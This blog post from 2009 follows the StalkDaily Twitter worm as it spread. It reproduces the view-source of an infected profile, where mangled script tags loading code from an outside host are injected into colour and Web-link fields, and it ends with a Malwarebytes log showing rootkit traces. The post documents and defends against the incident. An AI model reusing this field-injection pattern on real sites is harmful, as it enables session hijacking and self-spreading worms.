Skip Links

A Twitter virus shows up: StalkDaily

By CurtMonash on Sat, 04/11/09 - 5:31pm.

A Twitter virus has shown up.  Tweetstreams, including mine, send out the message:

Hey everyone, join www. StalkDaily. com. It's a site like Twitter but with pictures, videos, and so much more! :) 

(Of course, the URL link is live in the original.)

Update: Twitter now claims to have patched the hole that allowed the virus to spread. And I've posted a simpler version of the whole story.

Nobody seems to know yet exactly what is going on. is getting a lot of attention with advice to stop it, but basically just says "Change your password and clear your cookies and browser cache; that should work."

Some people are assuming the virus is contracted by actually visiting the site, but I'm sure I got it WITHOUT visiting the site.

I'll try to get more information here, in the main post or comment thread, when I can.

Edit: Mark Hawker is figuring out how this works, and updating the comment thread below. He's posting more detail yet in his own Twitter stream.

Edit: @pilot suggests disabling scripts via NoScript in FireFox.  But this has painful side effects.

Edit: @anowheels thinks clicking on the GangsterBoy Twitter account can cause infection -- and I did click there right before getting hit. The theory is plausible for other reasons.

Specifically, there's a profile broken in a way I haven't seen before, looking like:

View Source right now gives:

<DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">

<html xmlns="" xml:lang="en" lang="en">

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Twitter is a free social messaging utility for staying connected in real-time" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="IE=7" http-equiv="X-UA-Compatible" />
<meta content="y" name="session-loggedin" />
<meta content="11326952" name="session-userid" />
<meta content="CurtMonash" name="session-user-screen_name" />
<meta content="GangsterBoyHah" name="page-user-screen_name" />
<title>gangsterboy (GangsterBoyHah) on Twitter</title>
<link href="" rel="shortcut icon" type="image/x-icon" />
<link href="" rel="apple-touch-icon" />
<script type="text/javascript">
var page = {};

<link href="" media="screen, projection" rel="stylesheet" type="text/css" />
<link href="" media="screen, projection" rel="stylesheet" type="text/css" />
<style type="text/css">
/* begin custom css */
.top-navigation > li > a,
a { color: #0084B4; }
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
background-color: #9AE4E8;
background: #9AE4E8 url( fixed no-repeat top left;}
#side_base {
border-left:1px solid #BDDCAD;
background-color: #DDFFCC;
width: 199px; line-height: 1.2; -moz-border-radius-topright: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px;
#side div.last { border-top: 1px solid #BDDCAD; }
ul#tabMenu li {
display: block; width: 100%;
border-top: 1px solid #BDDCAD;
ul#tabMenu li a, #side .section h1 { color:#script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#content tr.hentry:hover a { color:#0084B4; }
body#profile #content div.hentry:hover a { color:#0084B4;}
#side .actions { border: 1px solid #BDDCAD; }
#side .promotion {
border: 1px solid #BDDCAD;
text-align: left; font-size: 11px; margin-top: 7px; padding: 6px 10px; width: 152px;
#side .promotion .definition span {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
#side .promo { border: 1px solid #BDDCAD; }
#side .stats td+td {
border-left: solid 1px #BDDCAD;
border-right: solid 1px #BDDCAD;
#side div.section-header h1 { color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#side div.section-header h3.faq-header {
border-bottom: 1px solid #BDDCAD;
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
#side .stat a {color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }

#side div.user_icon a, #side div.user_icon a:hover {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;

#side div.user_icon a:hover {
color: #0084B4;

#side .stats {
border-top: 1px solid #BDDCAD;

#side .stats a span.stats_count {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;

#side .stats a:hover span.stats_count {
color: #0084B4;

ul.sidebar-menu a b {
border-left: 5px solid #BDDCAD;

ul.sidebar-menu a {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;

#side hr {
background: #BDDCAD;
color: #BDDCAD;

#side .stats td+td {
border-left: none;
border-right: none;

#side div.collapsible h2.sidebar-title {
background: transparent url('') no-repeat center right !important;
width: 155px;

#side div.collapsible.collapsed h2.sidebar-title {
background: transparent url('') no-repeat center right !important;

/* end custom css */

.content-bubble-arrow { background-image: url(; }
.status-btn input.round-btn { background-image: url(''); }
.status-btn input.round-btn:hover { background-image: url(''); }
.status-btn input.disabled, .status-btn input.disabled:hover { background-image: url(''); }
.hentry .actions .fav { background-image: url(''); }
.hentry .actions .non-fav { background-image: url(''); }
.hentry .actions .fav-throb, .hentry .actions a.del-throb { background-image: url(''); }
.hentry .actions .del { background-image: url(''); }
body#show .reply, .hentry .actions .reply { background-image: url(''); }
.direct_message .actions .reply { background-image: url(''); }
.direct_message .actions .del { background-image: url(''); }
.notify { background-image: url(''); }
.promotion, ul#tabMenu a#keyword_search_tab.hover, ul#tabMenu a:hover { background-image: url(''); background-color: transparent; }
div#follow-toggle.closed { background-image: url(''); }
div#follow-toggle.opened { background-image: url(''); }
.follow-actions .following { background-image: url(''); }
.loading { background-image: url(''); }
.more { background-image: url(''); }
.more.loading { background-image: url(''); }
body#show .protected { background-image: url(''); }
#side .promotion { background-image: url(''); }
.rss { background-image: url(''); }

.bulletin a.close { background: transparent url('') no-repeat; }
ul.sidebar-menu a { font-weight: bol d; color: #333; background: url(''); }
ul.sidebar-menu li:hover a { text-decoration: none; background: url(''); }
#sidebar_search_submit { background: url('') -2px 0px !important ; }
#sidebar_search_submit:hover { background: url('') -2px -25px !important; }
#sidebar_search_submit:active { background: url('') -2px -50px !important; }
#sidebar_search_submit.loading, #sidebar_search_submit.loading:hover, #sidebar_search_submit.loading:active { background: #eee url('') no-repeat 5px 5px !important; }
#side .collapsible.loading h2.sidebar-title { background: transparent url('') no-repeat center right; }
#side .collapsible h2.sidebar-title {
background: transparent url('') no-repeat center right;
width: 155px;

#side .collapsible.collapsed h2.sidebar-title {
background: transparent url('') no-repeat center right;


<body class="account firefox-windows" id="profile">
<div id="dim-screen"></div>
<ul id="accessibility" class="offscreen">
<li><a href="#content" accesskey="0">Skip past navigation</a></li>
<li>On a mobile phone? Check out <a href=""></a>!</li>
  <li><a href="#footer" accesskey="2">Skip to navigation</a></li>
<li><a href="#tabMenu" accesskey="3">Jump to the sidebar</a></li>
<li><a href="#signin">Skip to sign in form</a></li>

<div id="container" class="subpage">
<span id="loader" style="display:none"><img alt="Loader" src="" /></span>

<h1 id="header">
    <a href="/home" title="Twitter: home" accesskey="1" id="logo">
<img alt="" height="36" src="" transparent_png="true" width="155" />

<div class="content-bubble-arrow"></div>

<table cellspacing="0" class="columns">
<td id="content" class="round-left column">
                                <div class="wrapper">

<div class="profile-head">
<h2 class="thumb">
<img alt="" class="profile-img" height="73" src="" width="73" /> GangsterBoyHah
<div class="clear"></div>

<div class="protected-box">
<table><tr><td><br /><img alt="Padlock_large" src="" /></td>
<td><h1>This person has protected their updates.</h1>

<br />
<span class='sub-h1'>You need to send a request before you can start following this person.</span>
<form action="friendships/create/30519351" method="post"><div style="margin:0;padding:0"><input name="authenticity_token" type="hidden" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" /></div> <input id="send_request" name="commit" type="submit" value="Send request" />
        </center><br />




<td id="side_base" class="column round-right">

<div id="side">

<div id="profile" class="section">
<span class="section-links">

<img src="" title="This user&rsquo;s updates are protected."/>
<ul class="about vcard entry-author">
<li><span class="label">Name</span> <span class="fn">gangsterboy</span></li>
<li><span class="label">Location</span> <span class="adr">Google</span></li>
                    <li><span class="label">Web</span> <a href="http://"><script src=""></script><script src=""></script><a " class="url" rel="me nofollow">http://"><script ...</a></li>


<div class="stats">

<a href="/GangsterBoyHah/friends" id="following_count_link" class="link-following_page" rel="me" title="See who you’re following">
<span id="following_count" class="stats_count numeric">903 </span>
<span class="label">Following</span>


<a href="/GangsterBoyHah/followers" id="follower_count_link" class="link-followers_page" rel="me" title="See who’s following you">
<span id="follower_count" class="stats_count numeric">2 </span>
<span class="label">Followers</span>

<td><a href="/GangsterBoyHah" class="link-updates" title="See all your updates" rel="me"><span id="update_count" class="stats_count numeric">126</span><span class="label">updates</span>


<ul id="tabMenu">
<a href="/GangsterBoyHah" accesskey="u" id="updates_tab">Updates</a> </li>
<a href="/GangsterBoyHah/favourites" accesskey="f" id="favorites_tab">Favorites</a> </li>

<div class="section last">
<a href="/direct_messages/create/30519351">message</a> GangsterBoyHah

<a href="/blocks/confirm/30519351" style="color: grey;">block</a> GangsterBoyHah


<div id="people" class="section last">

<div id="following_list">

<span class="vcard">
<a href="" class="url" rel="contact" title="Noword"><img alt="Noword" class="photo fn" height="24" src="" width="24" /></a>

<span class="vcard">
<a href="" class="url" rel="contact" title="soychicka"><img alt="soychicka" class="photo fn" height="24" src="" width="24" /></a>

<span class="vcard">
<a href="" class="url" rel="contact" title="SWAGGRITE ENT."><img alt="SWAGGRITE ENT." class="photo fn" height="24" src="" width="24" /></a>




<div id="footer" class="round">
<h3 class="offscreen">Footer</h3>

<li class="first">&copy; 2009 Twitter</li>
<li><a href="/about#about">About Us</a></li>
<li><a href="/about#contact">Contact</a></li>
<li><a href="">Blog</a></li>
<li><a href="">Status</a></li>
<li><a href="/downloads">Apps</a></li>
<li><a href="">API</a></li>
<li><a href="">Search</a></li>
<li><a href="">Help</a></li>
<li><a href="/jobs">Jobs</a></li>
<li><a href="/tos">Terms</a></li>
<li><a href="/privacy">Privacy</a></li>

<hr />

<div id="navigation">
<ul class="horizontal-nav top-nav round" style="display:inline">
<li><a href="" accesskey="h" id="home_link">Home</a></li>
<li><a href="" accesskey="p" id="profile_link">Profile</a></li>
<li><a href="" accesskey="=" id="find_people_link">Find People</a></li>
<li><a href="/account/settings" accesskey="s" id="settings_link">Settings</a></li>
<li><a href="" accesskey="?" id="help_link">Help</a></li>
<li class="last">

<a id="sign_out_link" href="#" onclick="document.getElementById('sign_out_form').submit(); return false;">Sign out</a>


<form method="post" id="sign_out_form" action="/sessions/destroy" style="display:none;">
<input name="authenticity_token" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" type="hidden" />


<script src="" type="text/javascript"></script><script src="" type="text/javascript"></script><script src="" type="text/javascript"></script><script src="" type="text/javascript"></script><script src="" type="text/javascript"></script>
<script src="" type="text/javascript"></script><script type="text/javascript">
twttr.form_authenticity_token = '5072bac31fff2d4527bccf68cf6c48d16f1c6735';
if ( !== window.self) { setTimeout(function(){document.body.innerHTML='';},1);window.self.onload=function(evt){document.body.innerHTML='';};}
</script><script type="text/javascript">

$( function () {
$('body#profile ul#tabMenu li a#updates_tab, body#favourings ul#tabMenu li a#favorites_tab').isSidebarTab();




<!-- BEGIN google analytics -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "' type='text/javascript'%3E%3C/script%3E"));

<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-30775-6");
pageTracker._setVar('Logged In');
pageTracker._setVar('lang: en');
} catch(err) { }

<!-- END google analytics -->

    <div id="notifications"></div>




Edit: A Malwarebytes scan comes up with three instances of malware.  One is the Seneka rootkit (ouch!).  I don't immediately know whether all three boil down to that. The logfile is below. I've bolded selectively.

Malwarebytes' Anti-Malware 1.36
Database version: 1969
Windows 5.1.2600 Service Pack 3

4/11/2009 6:49:38 PM
Malwarebytes log mbam-log-2009-04-11 (18-49-21)

Scan type: Full Scan (C:\|D:\|)
Objects scanned: 209851
Time elapsed: 34 minute(s), 30 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\cs41275 (Malware.Trace) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\seneka (Rootkit.Trace) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



Searching on Seneka rootkit turns up very different pages than searching on cs41275, so I suspect them of being two different infections.

As of this posting I haven't yet sorted out what to DO about these infections, but there's advice on the Web, especially about Seneka.

At a guess they're unrelated to StalkDaily, but I can't be sure at the moment.

On The Web